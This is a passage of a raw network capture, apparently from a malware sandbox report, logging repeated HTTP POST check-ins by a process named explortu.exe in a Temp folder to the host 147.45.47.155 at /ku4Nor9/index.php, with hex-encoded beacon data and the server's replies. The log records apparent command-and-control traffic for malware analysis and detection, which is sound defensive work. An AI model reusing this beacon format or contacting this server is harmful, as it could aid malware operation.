                                                                Jun 27, 2024 05:59:27.577075005 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:27.577980995 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:27.785056114 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.649753147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:27.894426107 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:28.563530922 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:28 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:28.565104008 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:28.772211075 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:28 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.649754147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:28.894599915 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:29.584376097 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:29 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:29.585201979 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:29.796463966 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:29 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.649755147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:29.912935019 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:30.599693060 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:30.600821018 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:30.812047958 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.649756147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:30.927376032 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:31.595586061 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:31.596640110 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:31.804677963 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.649757147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:31.931421041 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:32.599266052 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:32.611090899 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:32.822169065 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.649758147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:32.944766045 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:33.631484985 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:33.659645081 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:33.870496035 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.649759147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:33.988164902 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:34.665566921 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:34.666608095 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:34.875768900 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.649760147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:34.996073008 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:35.702776909 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:35 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:35.703627110 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:35.917597055 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:35 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.649761147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:36.035486937 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:36.710963964 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:36.714230061 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:36.922717094 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.649762147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:37.035628080 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:37.730726957 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:37.731919050 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:37.942049980 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.649763147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:38.053880930 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:38.723505020 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:38.724262953 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
